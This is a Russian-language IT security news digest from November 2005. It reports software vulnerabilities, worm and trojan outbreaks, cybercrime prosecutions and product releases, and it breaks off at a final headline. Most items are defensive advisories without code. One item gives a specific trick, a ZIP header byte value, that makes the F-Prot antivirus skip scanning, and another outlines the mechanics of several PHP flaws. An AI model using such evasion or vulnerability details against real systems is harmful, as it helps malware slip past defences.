Быстрый рост популярности программного обеспечения, основанного на интернет-технологиях, приведет к "кардинальным сдвигам" на рынке, предсказывает председатель Microsoft Билл Гейтс. В электронном письме к топ-менеджерам Microsoft от 30 октября, которое оказалось в распоряжении АР во вторник, 8 ноября, Гейтс требует от руководителей компании сосредоточиться на программном обеспечении и сервисах нового поколения. Глава Microsoft особо подчеркивает, что нужно "действовать быстро и решительно". Однако это не значит, пишет Гейтс, что компания должна забывать о покупателях - Microsoft должна развивать правильные технологии для правильной аудитории. "Грядущее лавинообразное увеличение сервисов окажется очень разрушительное влияние на рынок, - пишет Гейтс. - У нас есть конкуренты, которые воспользуются конъюнктурой рынка для того, чтобы бросить нам вызов - пока существует вероятность оказаться лидером рынка". Гейтс сравнивает изменения, которые спровоцирует развитие таких сетевых услуг, как интернет-приложения и бесплатная электронная почта, с изменениям, о которых основатель Microsoft говорил около 10 лет назад. Тогда он написал меморандум "Всеобщее увлечение Интернетом" (The Internet Tidal Wave), в котором призвал сотрудников Microsoft сконцентрироваться на интернет-технологиях. "Мы на пороге нового кардинального сдвига", - пишет Гейтс.
Источник

9/11/2005 10:15 Microsoft выпускает очередной патч
В рамках своего ежемесячного обновления Microsoft на сей раз (как мы писали ранее) осчастливила пользователей своих ОС очередным патчем, закрывающем довольно опасную уязвимость. В выпущенном вчера бюллетене MS05-053 констатируется факт наличия уязвимости в движке обработке графических изображений. В частности, речь идёт об обработке файлов формата WMF (Windows Metafile) и EMF (Enhanced Metafile). Используя уязвимость, злоумышленник может выполнить произвольный код на компьютере жертвы. Опасность уязвимости усугубляется тем, что она может проявиться в любых приложениях, который работают с графикой, например - при обработке документа Microsoft Office с внедрённым изображением (разумеется, при открытии почты при помощи Outlook Express, при просмотре Вэб-страниц при помощи браузера и т.д.). Уязвимости подвержены 3 наиболее распространённые на текущий момент ОС: Windows XP/2K/2003 (98/ME уязвимости не подвержены). Подробности уязвимости пока не раскрыты авторами (судя по всему - eEye Digital Security), эксплоит пока для широких масс тоже не выпущен. Уязвимости присвоен рейтинг "критическая".
MS05-053

8/11/2005 11:42 Двойники "Русского радио" лохотронят сотовых абонентов
В России проходит широкомасштабная мошенническая акция. Злоумышленники от лица "Русского Радио" и одного из федеральных операторов сотовой связи звонят людям и сообщают им о "грандиозном выигрыше". В результате доверчивые граждане остаются без приза и без денег. Мошенническая схема проста. Сначала злоумышленники от лица "Русского радио" извещают жертву о "выигрыше" звонком или текстовым сообщением. Как правило, в качестве приза выступает дорогая модель сотового телефона или автомобиль. Затем обрадованному человеку объясняют, как и где он может забрать свой приз. Мошенники называют адрес "Русского Радио" и уточняют, что забрать приз можно, купив карту оплаты сотовой связи номиналом от 400 рублей и выше. После приобретения карты жертве советуют перезвонить и пройти процедуру "проверки". Мошенник выманивает номер карты и активационный код и обещает, что вскоре человек получит приз. Если речь идет о более ценном призе, автомобиле, то в этом случае жертве предлагают забрать подарок, но с одним условием. Человеку предлагают оплатить дарственную, которая оценивается злоумышленниками в $400 - $500, причем не деньгами, а все теми же картами экспресс-оплаты.
Подробности

8/11/2005 11:02 В продуктах Zone Labs найдена уязвимость
Эксперты по информационной безопасности обнаружили уязвимость в продуктах Zone Labs, поставщика решений в области интернет-безопасности. Уязвимость позволяет удаленному пользователю обойти механизм защиты и получить доступ к важным данным на системе. Уязвимость обнаружена при включенном механизме Advance Program Control или OS Firewall Technology. Удаленный пользователь может с помощью метода ShowHTMLDialog() создать модальное диалоговое HTML-окно с использованием Javascript-сценария, обойти ограничения безопасности и переслать потенциально важные данные атакующему. «Дыре» присвоен рейтинг опасности «средняя». Уязвимы Zone Alarm Pro 6.0.x; Zone Alarm Internet Security Suit 6.0.x; Zone Alarm Firewall with Anti-Spyware 6.1.x; Zone Alarm Firewall with Anti-Virus 6.0.x; Zone Alarm Firewall (Free Version) 6.0.x. Для использования уязвимости есть эксплойт. В настоящее время способов устранения уязвимости не существует.
Описание

8/11/2005 10:26 Linux-системы атакует новый червь
В интернете распространяется новый компьютерный червь, использующий уязвимости веб-серверов, и атакующий Linux-системы. Об этом сообщила антивирусная компания McAfee, назвавшая вредоносный код Lupper. Червь для своего распространения экплуатирует веб-серверы, содержащие уязвимые скрипты. По данным Symantec, назвавшей червя Plupii, он использует три уязвимости: XML-RPC, AWStats Rawlog Plugin Logfile и Darryl Burgdorf's Webhints. Червь устанавливает свою копию, и создает "черный ход", позволяющий контролировать систему удаленно. Эксперты McAfee присвоили коду рейтинг опасности "низкая", Symantec - "средняя".
Источник

8/11/2005 10:06 Кофи Аннан не собирается отбирать Интернет у США
Глава ООН Кофи Аннан заявил, что возглавляемая им организация не намеревается претендовать на контроль за базовыми механизмами Интернета вопреки соответствующим призывам представителей некоторых государств. Об этом говорится в опубликованной им накануне колонке в газете Washington Post. Аннан пишет, что стремление государств принимать участие в процессе контроля за глобальной сетью понятно, но правительства в одиночку не могут устанавливать правила. По его мнению, существующая практика, когда Интернет юридически контролируется делегатами организации ICANN, представляющими структуры, внесшие вклад в его развитие, а не представителями правительств, является оптимальной. Как известно, вопрос о передаче юридических полномочий по контролю за централизующими функциями глобальной компьютерной сети подняли некоторые страны-члены ООН в преддверии саммита ООН по информационному сообществу (WSIS), который начнется 16 ноября в Тунисе. На нем будет обсуждаться то, как меняется мир в условиях современной информационной обстановки, одну из важнейших ролей в которой играет Интернет.
Подробности

8/11/2005 09:42 В свободную продажу поступили свежие данные о доходах москвичей
В Москве неофициально торгуют свежей базой данных о доходах москвичей - теперь за 2004 год. База "Налоговая инспекция - 2004" содержит более 9,9 миллиона справок о доходах физических лиц Москвы и Подмосковья с помесячной разбивкой, сведениями о месте работы, реквизитами и адресами налогоплательщиков, пишут "Ведомости". Предложения о продаже распространяются с помощью электронной почты, кроме того приобрести базу можно на компьютерных рынках. Интересно, что в Интернете база оценивается в 3000 рублей, тогда как с рук ее покупают за 1400 рублей. Как отмечает газета, торговля подобными базами незаконна и подпадает под статью 183 УК РФ ("незаконное получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну"). Наказание по этой статье варьируется от 3 до 10 лет тюрьмы. Огласка сведений о доходах москвичей уже стала регулярной. Весной 2005 года поступили в продажу аналогичные базы за 2003 год, а в ноябре 2004-го - за 2002 год. Однако, как сообщил газете источник в центральном аппарате МВД РФ, по факту утечек данных о налогоплательщиках "конкретных уголовных дел нет".
Источник

7/11/2005 20:39 В Microsoft разрабатывают новую ОС Singularity
Сотрудники исследовательского подразделения Microsoft работают над очередным проектом под кодовым названием Singularity, в рамках которого предполагается разработка новой операционной системы. Singularity не имеет никакого отношения к Windows и создается с "чистого листа". В настоящее время ядро будущей ОС насчитывает порядка 300 тысяч строк кода, сообщает Microsoft Watch. Основная цель проекта Singularity заключается в разработке принципиально новой программной платформы, при проектировании которой большая часть усилий направлена на обеспечение надежности. Например, процессы в новой ОС выполняются в специальных изолированных "контейнерах" - так называемая технология Software Isolated Processes (SIP). В проект Singularity вовлечено около 35 программистов. При написании кода используется комбинация языка C# и языка Sing#, производной C#. Будущее Singularity пока четко не определено. В перспективе ОС может быть выпущена в виде независимой платформы, например, для встраиваемых устройств, или же разработчики решат разбить продукт на ряд отдельных компонентов для использования в других приложениях.
О проекте

7/11/2005 14:21 В ноябре Microsoft выпустит только одну заплатку
Корпорация Microsoft в рамках выпуска ежемесячных обновлений для своих программных продуктов планирует представить в ноябре одну заплатку. Как сообщается в предварительном уведомлении на веб-сайте Microsoft, новая дыра обнаружена в операционных системах Windows. Брешь получила статус критически опасной и, соответственно, может использоваться злоумышленниками с целью получения несанкционированного доступа к удаленному компьютеру. После установки патча для этой уязвимости потребуется перезагрузка компьютера. Заплатка будет выпущено во вторник 8 ноября одновременно с обновленной версией утилиты для обнаружения наиболее распространенных вредоносных программ - Microsoft Windows Malicious Software Removal Tool. Скачать апдейты пользователи продуктов Microsoft смогут через веб-сайт корпорации, службы Windows Update, Microsoft Update и встроенные в Windows средства автоматического обновления.
Уведомление

7/11/2005 13:44 Panda: эпидемия Mitglieder затронула 30 стран
По данным Panda Software, четыре из пяти троянцев семейства Mitglieder, зарегистрированных на настоящий момент, находятся в шестерке наиболее часто обнаруживаемых по всему миру угроз. Лавина троянцев Mitglieder продолжается: более тридцати стран пострадали от различных версий этой угрозы. Четыре из пяти версий (FK, FL, FM и FN) входят в шестерку угроз, наиболее часто обнаруживаемых бесплатным онлайновым антивирусом Panda ActiveScan. Кроме того, по данным антивирусной лаборатории компании Panda Software, червь Bagle.FN объединил усилия с троянцем Mitglieder.FK. Bagle.FN отправляет с зараженных собой компьютеров троянца., что является новым взаимодествием угроз в целях повышения степени распространения. Червь Bagle.FN распространяется, отправляя себя на все адреса, которые он находит на зараженном компьютере. Его основные действия состоят в отключении защиты компьютера и попытке скачивания файла, обладающего способностью генерации электронных адресов, на которые отправляется Mitglieder.FK. Несмотря на то, что появился ряд новых версий Mitglieder, их функции очень схожи: они устанавливаются на компьютеры и, в случае с версиями FK, FL и FN, пытаются скачать файлы с удаленного сайта, что открывает путь новым угрозам. Основные действия версии FM – отключение антивирусной защиты на компьютере, блокирование доступа к веб-страницам (в основном принадлежащим компаниям ИТ-безопасности), запрещение внесения изменений в реестр для того, чтобы лишить пользователя возможности исправить эти действия.
Источник

7/11/2005 12:45 Обнаружены эстонские банкиры-хакеры
Во вторник 01 ноября SEC (комиссия по ценным бумагам и биржам США) направила в суд города Нью-Йорка иск против эстонского банка Lohmus Haavel & Viisemann (LHV) и двух его высокопоставленных сотрудников (руководителей подразделений банка), обвиняя их в хакерской деятельности, получении с помощью шпионских программ инсайдерской информации, на основе которой подозреваемые смогли заработать 7,8 миллиона долларов. Молодые эстонские банкиры Оливер Пеек и Кристьян Лепик решили не гадать на курсах акций мировых компаний, а получить доступ к конфиденциальной информации на сайте Business Wire. Клиенты Business Wire размещают свои пресс-релизы в зашифрованном виде на закрытом от остального мира сайте, где размещенные материалы обрабатываются администрацией и готовятся к выпуску. Далее на эти материалы, уже открытые для обозрения, ориентируются брокеры всех мировых бирж в оценках стоимости акций. В январе этого года двое эстонцев, воспользовавшись служебным положением и компьютерными системами банка LHV, разместили шпионскую программу-робота, которая автоматически начала обшаривать закрытый сайт, находила защищенные паролями участки и пыталась подбирать пароли, а в случае успеха взлома, начинала пересылать своим хозяевам размещаемые на закрытом сайте пресс-релизы других компаний. Таким образом, молодые банкиры получали сведения на пару часов раньше всего остального мира, чем активно пользовались. С января по октябрь 2005 года с помощью шпионской программы эстонцы получили доступ к конфиденциальным материалам более 200 американских компаний, сумев выгодно использовать эти сведения для покупки или продажи акций. За 10 месяцев этого года молодые люди смогли заработать на двоих 7,8 миллиона долларов.
Источник

7/11/2005 12:33 Новая угроза пользователям интернет-пейджеров
С утра 7 ноября в Рунете в виде передаваемой через интернет-пейджеры ссылки распространяется Trojan-PSW.Win32.LdPinch.xh, cообщает "Лаборатория Касперского". Вредоносная программа рассылается по контакт-листу интернет-пейджера зараженной машины, из-за чего получающие ссылку пользователи думают, что она пришла им от знакомых людей, скачивают программу по ссылке и запускают ее на выполнение. Получаемое пользователями сообщение выглядит следующим образом:
Самый интересный ролик из всех что я видел :)
<ссылка>
Пользователям настоятельно не рекомендуется скачивать содержимое указанной в подобном сообщении ссылки (по ней находится RAR-архив размером 26 КБ), даже если это сообщение от знакомого. Тем, кто уже скачал и запустил находившийся в архиве файл необходимо срочно сменить все пароли — в том числе на доступ к почте и к интернет-пейджерам.
Источник

7/11/2005 11:12 InfoWatch защитит таможенников от утечки информации
Компания InfoWatch, разработчик систем защиты предприятий от внутренних ИТ-угроз, победила в конкурсе на разработку системы защиты от утечки конфиденциальной информации для Федеральной таможенной службы (ФТС) РФ. В соответствии с положениями конкурса InfoWatch выполнит опытно-конструкторскую работу по созданию технологической платформы для выявления каналов утечки из Центральной базы данных Единой автоматизированной информационной системы таможенных органов. Основная задача решения - централизованный контроль над действиями пользователей (должностных лиц центрального аппарата ФТС России, ГНИВЦ ФТС России и таможенных органов) с информацией ограниченного доступа. В ходе реализации проекта будут внедрены механизмы оперативного анализа и аудита данных об информационных потоках для принятия оперативных мер по выявлению и локализации каналов утечки данных. Проект отличается модульным принципом построения и трехуровневой архитектурой, включающей целевую, вспомогательную и обеспечивающую подсистемы.
Источник

7/11/2005 10:20 Sun завершает работу над Niagara
По сообщению инженеров Sun, в ее новом процессоре архитектуры Sparc, Niagara, будут присутствовать четыре встроенных контроллера памяти DDR2. Первая модель Niagara сможет обрабатывать в параллельном режиме до 32 индивидуальных задач, - восемь ядер процессора будут способны одновременно исполнять по четыре нити каждое. Встроенный контроллер памяти может работать на той же частоте, что и сам процессор, за счет чего данные будут поступать непосредственно по мере их обработки, без задержек. Как сообщают в Sun, использование нескольких контроллеров позволило оснастить Niagara встроенной кэш-памятью относительно небольшой емкости (3 Мбайт), выполнив процессор достаточно компактным, чтобы максимизировать объемы выпуска чипов в расчете на каждую кремниевую основу. Максимальное энергопотребление Niagara составит 70 Вт, - на 30 Вт меньше, чем у новой модели Itanium 2. Серверы на основе нового процессора Sun планируются к выпуску в начале 2006 года.
"Открытые системы"

7/11/2005 10:06 Red Hat займется Linux всерьез
Стараясь играть более активную роль в движении open source, Red Hat создала команду из 34 программистов для работы над «программным обеспечением нового поколения». Этот шаг стал возможным благодаря растущим доходам продавца Linux и позволит программистам заниматься настоящей разработкой, вместо того чтобы думать о требованиях по поддержке заказчиков, говорит новый главный технолог Red Hat Брайан Стивенс. В ближайшие девять месяцев компания планирует удвоить эту команду. Перед программистами ставится несколько задач: интегрировать в систему программное обеспечение Xen, чтобы компьютер мог работать сразу с несколькими операционными системами; усовершенствовать технологию stateless Linux, чтобы сделать настольную Linux более экономически эффективной опцией; а также усовершенствовать такие инструменты, как испытательное ПО SystemTap. «Мы создаем команду разработчиков новых технологий, — пояснил Стивенс. — Есть много хороших идей, для реализации которых нам до сих пор не удавалось создать тепличные условия». Данный шаг сигнализирует о начале более активного этапа разработок для Red Hat, которая обычно вносила в программное обеспечение изменения только тогда, когда они получали широкую поддержку среди программистов open source. Теперь компания пытается быстро реагировать на специфические требования заказчиков, даже если ей приходится работать над этим самой. «В прошлом Red Hat работала, как большинство компаний open source. Они дожидаются, пока в сообществе разработчиков появится то или иное решение, созреет и начнет привлекать пользователей. Затем приходит Red Hat, превращает его в поддерживаемый пакет и начинает распространять, — поясняет аналитик Ideas International Тони Айемс. — Теперь же Red Hat говорит, что она может не ждать, пока все утрясется».
Подробнее

6/11/2005 11:52 Уязвимость в Macromedia Flash Player
eEye Digital Security сообщает о наличии серьёзной уязвимости в популярном в последнее время (в связи с широким распространением флэш-технологий) плеере Macromedia Flash Player. Уязвимость связана с некрректной проверкой граничных условий в одфной из функций в файле Flash.ocx, который содержит код, связанный с обратным проигрыванием SWF-файла. Подобная ошибка может привести к возможности внедрения во флэш-файл потенциально опасного кода, который может быть выполнен Flash-плеером. Настоятельно рекомендуется обновить до вновь вышедших версий (8.0.22.0) и 7.0.61.0. eEye Digital Security была продемонстрирована возможность проведения атаки через браузер Internet Explorer.
Подробности

6/11/2005 11:08 Множественные уязвимости в Apple QuickTime Player
Piotr Bania сообщил о существовании 4-х уязвимостей в популярном медиа-плеере QuickTime Player, выпускаемом компанией Apple. Уязвимости охаректирозавны, как критичные, потому что способны вызвать удлённые переполнения буфера, которые, в заивимости от природы атаки способны вызвать как DoS, так и выполнение произвольного кода. Первая уязвимость связана с возможностью целочисленного переполнения буфера при обработке строки в стиле "Pascal" при загрузке видеофайла с расширением ".mov", что может позволить записать очень большой блок памяти с перезаписью важных областей. Удаленный пользователь может с помощью специально сформированного видеофайла .MOV выполнить произвольный код на целевой системе. Вторая уязвимость возникает при обработке различных атрибутов .mov-файлов, что также может привести к возможности перезаписи важных областей системной памяти. Третья уязвимость связана с обработкой в QuickTime PictureViewer PICT-файлов при декомпрессии данных, при этом размер разархивируемых данных может превысить размер буфера, отводимого для работы приложения с дальнейшей перезаписью важных областей памяти. Удаленный пользователь может создать специально сформированный PICT файл и выполнить произвольный код на целевой системе. Ну и последняя уязвимость связана с технолгией обработки нулевого указателя при обработке отсутствующих атрибутов в видеофайле. Удаленный пользователь может аварийно завершить работу приложения. Уязвимости обнаружены в QuickTime версии 6.5.2 и 7.0.1 для Mac OS X и QuickTime до версии 7.0.3 для Windows. Рекомендуется скачать с сайта производителя выпущенную недавно версию 7.0.3.
Подробные описания

6/11/2005 10:42 Уязвимость в продуктах F-Prot
Thierry Zoller сообщает о наличии уязвимости в популярном антивирусном продукте F-prot, выпускаемом FRISK Software для многих операционных систем (Windows, Linux, AIX, DOS, Solaris). Как выяснилось, если сформировать ZIP-файл со значением четвёртого байта в заголовке файла, равным 15, антивирус перестаёт декомпрессировать файл и прекращает дальнейшую проверку. Производители обещают включить исправление в следующую версию F-prot.
Подробности

6/11/2005 10:20 ПК в качестве услуги
IBM заключила партнерский договор с компаниями Citrix и VMware, совместно с которыми она будет поставлять заказчикам "виртуальные" ПК. Решение, разрабатываемое сервисным подразделением IBM, получило названием Virtualized Hosted Client Infrastructure. Пользователям для доступа к таким ПК достаточно будет наличия любого клиентского устройства, поддерживающего протоколы Citrix. Операционная система и все приложения будут размещаться у IBM на лезвийных серверах, каждый из которых можно будет разбить на несколько виртуальных машин при помощи ПО VMWare ESX Server. До сих пор IBM предлагала подобные "лезвийные" ПК лишь в партнерстве с лидером данного рыночного сегмента ClearCube, решение которой требует подключения каждого клиентского устройства к выделенному серверу. Как утверждают в IBM, использование виртуализации обеспечивает клиентам экономию до 60%, а пользование услугой окупается за полгода. ПО Citrix Presentation Server обеспечивает удаленным пользователям, в том числе мобильным, возможность работы с полнофункциональными ПК, в числе прочего поддерживающими печать и USB-накопители. Услугу планируется начать предлагать с I квартала будущего года.
"ОТкрытые системы"

6/11/2005 10:14 Cтатьи о переполнении буфера
На сайте американской компании SecurityCompass начали публиковать цикл статей, который посвящены теме переполнения буфера в стэке в ОС Windows. Предполагается написать 4 главы:
Part I – Basic Concepts
Part II - Windows Assembly for writing Exploits
Part III - Stack Overflows
Part IV – Shell Code Creation and Exploiting An Application Remotely.
На данный момент опубликованы первые 2 (в формате PDF). Предполагается также дополнить части приложением, в котором будут приведены примеры исходных кодов, о которых говорится в главах. Оставшиеся 2 части авторы опубликуют на следующей неделе.
Cтатьи

6/11/2005 09:34 Дело Левина. Недостающее звено
На сайте назависимого обзора провайдеров опубликована довольно любопытная статья под названием "Дело Левина: Недостающее звено", в которой автор статьи от (якобы) первого лица излагает версию событий, произошедших в том далёком 1995 году, которые наделали столько шума. "В марте 1995 года в британском аэропорту был арестован житель Санкт-Петербурга Владимир Левин. Ему было предъявлено обвинение в хищении более $10 млн. из американского банка Citibank — после того, как в разных странах мира его сообщники с разной степенью успеха пытались получить эти деньги. С разной, значит — некоторые получили, некоторые не получили, а некоторые были арестованы при попытке — а спустя два года сам Левин был выдан в США и приговорен судом Нью-Йорка к трем годам тюрьмы и штрафу в размере $240015. Так или иначе, этот человек попал во все известные редакции списка «зала хакерской славы» и надолго остался самым знаменитым русским хакером". Собственно, в самой статье озвучивается версия, которая итак уже известна компьютерному андэграунду и гласит, что Левин просто воспользовался результатами чужого труда. Также хотелось бы отметить, что Дмитирий Леонов (ака dl - один из авторов знаменитых "Атака на Интернет" и "Атака из Интернет" ) пишет на сайте bugtraq.ru, что выход статьи подвиг его на добавление в "Введение" книги "Атака из Интернет" рассказа одного из участников той истории, который тоже советуем прочитать. Если проанализировать оба рассказа - можно обнаружить очень много совпадений.
"Дело Левина: недостающее звено"
Ещё один ракссказ

6/11/2005 09:17 Системного администратора посадили за установку пиратской Windows
Ленинский районный суд г. Ростова-на-Дону вынес приговор по ч. 2 ст. 146 УК РФ (незаконное использование объектов авторского права совершенное неоднократно либо группой лиц по предварительному сговору, или организованной группой) в отношении начальника информационного подразделения ООО "Сервер-плюс". Бывший начальник информационного подразделения был осужден на 1 год колоннии-поселения. Его арестовали в зале суда. Прокуратура четыре раза отказывала в возбуждении уголовного дела, но каждый раз Microsoft добивалась отмены решения через суд.
Источник

5/11/2005 22:11 FreeBSD 6.0-RELEASE
Официально представлен релиз новой версии свободной операционной системы FreeBSD — 6.0-RELEASE.
Релиз FreeBSD 6.0-RELEASE стал «следующим шагом в предоставлении высокопроизводительных функций и возможностей корпоративного класса, которые разрабатывались на протяжении последних лет в FreeBSD 5.x». Среди ключевых изменений в FreeBSD 6.0 по сравнению с 5.4 отмечается: значительные улучшения в производительности файловой системы и прямом доступе к диску; файловая система теперь многопоточна и может воспользоваться всеми преимуществами многопроцессорных систем; расширенная поддержка беспроводных сетевых адаптеров и новая реализация поддержки беспроводного безопасного протокола WPA; экспериментальная поддержка платформы PPC (PowerPC). Подробности о релизе FreeBSD 6.0-RELEASE для каждой архитектуры описаны в
Release Notes, а образы ISO с FreeBSD 6.0 доступны для свободного скачивания на ftp.freebsd.org.
Nixp.Ru

5/11/2005 22:03 В Израиле на ICQ подали в суд из-за анонимных SMS
Израильская фирма "Тана" подала в окружной суд Тель-Авива иск, с требованием обязать компанию ICQ передать ей идентификационные данные человека, который анонимно посылает SMS на мобильные телефоны сотрудников фирмы. Это первый в Израиле иск такого рода. "Тана" занимается установкой систем очистки питьевой воды. В иске говорится, что на протяжении месяца ведущие сотрудники компании получают на свои сотовые телефоны (причем в ночное время) SMS, которые, судя по содержанию, посылаются с единственной целью: потревожить адресата. Впрочем, в ряде сообщений, отмечается в исковом заявлении, "содержались слова, порочащие генерального директора "Тана" Дани Таргана и наносящие ущерб деловой репутации фирмы". Хотя SMS были анонимными, но в них имелся номер, присваиваемый каждому пользователю ICQ. "Тана" обратилась непосредственно к ICQ с просьбой сообщить данные "SMS-хулигана". Получив отказ, фирма подала иск в суд.
Подробности

5/11/2005 21:49 Великобритания: DoS-атаки разрешаются
Анонимный британский тинейджер, который забросал своего бывшего работодателя 5 млн. электронных писем признан невиновным и отпущен на свободу. Действия подростка можно трактовать как атаки DoS (отказ в обслуживании). Данный вид атак не упоминается в законодательном акте Computer Misuse Act 1990, и, следовательно, не считается преступлением. Решение об освобождении принял окружной судья Кеннет Грант (Kenneth Grant). По его мнению, тинейджер не производил неавторизованный вход и не модифицировал систему, и, поэтому, невиновен.
Источник

5/11/2005 21:27 В Cisco IOS обнаружена опасная уязвимость
Эксперты по информационной безопасности обнаружили уязвимость в операционной системе Cisco IOS, которая позволяет злоумышленнику вызвать отказ в обслуживании или выполнить произвольный код на системе. Уязвимость обнаружена в системных таймерах на Cisco IOS. Злоумышленник может вызвать переполнение кучи и выполнить произвольный код на целевой системе или произвести DoS-атаку. «Дыре» присвоен ретинг опасности «высокая». Уязвимы Cisco IOS 10.x; Cisco IOS 11.x; Cisco IOS 12.x; Cisco IOS R11.x; Cisco IOS R12.x. Для использования уязвимости нет эксплойта. Для решения проблемы установите исправление с сайта производителя.
Источник

5/11/2005 21:15 Два недавних обновления для Internet Explorer содержат ошибки
Корпорация Microsoft признала, что два недавних обновления для Internet Explorer, содержат особенности, которые могут негативно сказаться на работоспособности отдельных сайтов. Патчи, распространяемые вместе с бюллетенями MS05-038 и MS05-052 (август и октябрь 2005 года, соответственно) могут вызывать проблемы с элементами ActiveX и с Java-приложениями. По уверениям сотрудников Microsoft, впрочем, проблемы могут возникнуть лишь у очень ограниченного количества сайтов. Патч MS05-52 вносит некоторые изменения в Windows - с целью повысить степень защищённости IE. После установки, IE будет проверять отдельные установки безопасности, связанные с ActiveX (а именно - интерфейс IObjectSafety), и в случае, если таковые будут отсутствовать, элемент AcitveX не будет работать. Чтобы избежать этой проблемы Microsoft рекомендует перекомпилировать соответствующий элемент ActiveX, и обозначить его как безопасный. Как менее желательный вариант, можно снижать уровень безопасности в установках самого браузера. Что же касается MS05-038, то в данном случае проблемы с элементами ActiveX и Java-приложениями будут возникать, если используются Java-моникеры, поскольку MS05-038 отменяет их поддержку в Internet Explorer.
Подробности

5/11/2005 20:43 Трое российских интернет-мошенников получили срок
2 ноября были осуждены трое россиян, покупавших товары в интернет-магазине Softkey по чужим кредитным картам. Останкинский суд признал Бориса Позднеева, Олега Рыжикова и Сергея Дмитриева виновными по части 4 ст. 159 УК - мошенничество, совершенное организованной группой (предусматривает лишение свободы на срок от пяти до десяти лет со штрафом в размере от 1 млн. рублей). Однако суд принял во внимание смягчающие обстоятельства (возмещение ущерба и помощь следствию), пишет газета "Ведомости". Молодые люди, возраст которых 18-19 лет, получили по пять лет условного заключения. С февраля по апрель 2005 года Позднеев, Рыжиков и Дмитриев приобретали через интернет софт и вводили номера карт и персональную информацию, которую они приобрели у неустановленных мошенников. В общей сложности преступная группа купила ПО на 80000 рублей. Подозрительные покупки привлекли внимание отдела мониторинга Softkey, и за приобретениями с этих кредитных карт начали следить правоохранительные органы. В апреле 2005 года мошенники были задержаны при покупке компьютерных товаров на 60000 рублей.
Источник

5/11/2005 20:21 Sony защищает CD недозволенным приемом?
Испытывая на этой неделе секьюрити-ПО, в создании которого он участвовал, Марк Руссинович обнаружил глубоко во внутренностях своего ПК то, чего там быть не должно. Опытному программисту, написавшему книгу по Windows, потребовалось время, чтобы точно установить, откуда это взялось; но в конце концов выяснилось, что код оставлен недавно купленным им CD. Альбом Ван Занта производства SonyBMG, приобретенный на Amazon.com, рекламировался как защищенный от копирования, и поместив диск в свой компьютер, Руссинович подтвердил соглашение по инсталляции. Позднее он обнаружил, что ПО использует изощренный способ маскировки с применением rootkit — инструмента, который сам по себе не опасен, но часто используется вирмейкерами, чтобы замести все оставленные ими в компьютере следы. «Мы пытаемся провести черту между справедливым использованием и нарушением цифровых прав, и возникающие проблемы типа этой необходимо обсудить с юристами и компаниями, чтобы решить, что является справедливым и честным, — говорит Руссинович. — Однако это, по-моему, заходит слишком далеко». Руссинович подробно описал свои действия в блоге, что немедленно вызвало критику технологии SonyBMG со стороны представителей секьюрити-сообщества. Гневная реакция подчеркивает, что, несмотря на нарастающее число выпускаемых популярных альбомов с защитой от копирования, эта технология все еще способна возбуждать горячие эмоции и вызывать яростные споры. Некоторые секьюрити-компании считают, что rootkit подвергает компьютер риску — по крайней мере теоретическому.
Подробности

5/11/2005 20:06 ФБР намеревается впервые осудить хакера за получение прибыли
В Лос-Анджелесе агентами ФБР в четверг был арестован местный житель 20-летний Дженсон Анчета (Jeanson Ancheta). Он подозревается в причастности к деятельности хакерской группировки "Botmaster Underground", которая специализируется на создании так называемых сетей "компьютеров-зомби" (botnet). Сети состоят из компьютеров, зараженных вирусами, которые группировка регулярно рассылает. С помощью этих сетей можно рассылать спам и проводить распределенные сетевые атаки. Как сообщает Reuters, ФБР задержала Анчету, заманив его под предлогом делового сотрудничества. Представители ФБР отмечают, что дело Анчеты станет первым в своем роде, так как главным из 17 пунктов обвинений против него станет не его непосредственная хакерская деятельность, а продажа сторонним заказчикам услуг, оказываемых при помощи хакерских инструментов. Ранее хакеров обвиняли в деструктивных действиях, не увязывая это с получением криминальной прибыли. Обвинение в получении доходов преступным путем более серьезные, и по совокупности всех пунктов обвинения Анчета может получить срок до 50 лет. Согласно обнародованным данным, арестованный заработал около 60 тысяч долларов на распространении "шпионских программ" (spyware) и использовал деньги на дополнительные серверные мощности для своей сети, на различную компьютерную технику, а также на покупку автомобиля BMW. Среди атакованных Анчетой интернет-сетей - сети одной из военных баз США и сеть Пентагона.
Источник

1/11/2005 12:51 В PHP обнаружены множественные уязвимости
Эксперты по информационной безопасности обнаружили уязвимости в программе РНР, которые позволяют удаленному пользователю произвести XSS-нападение, обойти ограничения безопасности и потенциально скомпрометировать систему. Массив GLOBALS является недостаточно защищенным. Удаленный пользователь может переопределить глобальные переменные с помощью multipart/form-data POST запроса со специально сформированным полем file upload или посредством сценария, вызывающего функцию extract() или "import_request_variables()". Удачная эксплуатация уязвимости требует, чтобы опция register_globals была включена в конфигурационном файле PHP. Обнаружена ошибка при обработке входных данных в функции parse_str(), когда эта функция вызывается только с одним параметром. Злоумышленник может отключить memory_limit во время обработки входных данных в функции parse_str() путем отправки уязвимой функции большого количества переменных. Функция parse_str(), на время обработки входных данных, включает опцию register_globals, и если во время выполнения функции произойдет отключение memory_limit, то опция register_globals останется включенной до перезагрузки веб-сервера. Межсайтовый скриптинг возможен при обработке входных данных в функции phpinfo(). Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Удаленный пользователь может обойти механизмы безопасности safe_mode и open_basedir с помощью модулей ext/curl и ext/gd. Неопределенная ошибка при вызове функции virtual() в Apache 2 может быть использована для обхода ограничений безопасности директив safe_mode и open_basedir. «Дыре» присвоен ретинг опасности «средняя». Уязвимы PHP 4.4.0 и более ранние версии, 5.0.5 и более ранние версии.
Подробности

1/11/2005 12:37 Выход OpenBSD 3.8
Команда разработчиков проекта OpenBSD сообщает о выходе сегодня новой версии ОС - 3.8. Список изменений довольно значителен. Включена поддержка нового "железа", добавлены новые утилиты.
Подробности

1/11/2005 11:01 AIM-червь обучился новому смертельному трюку
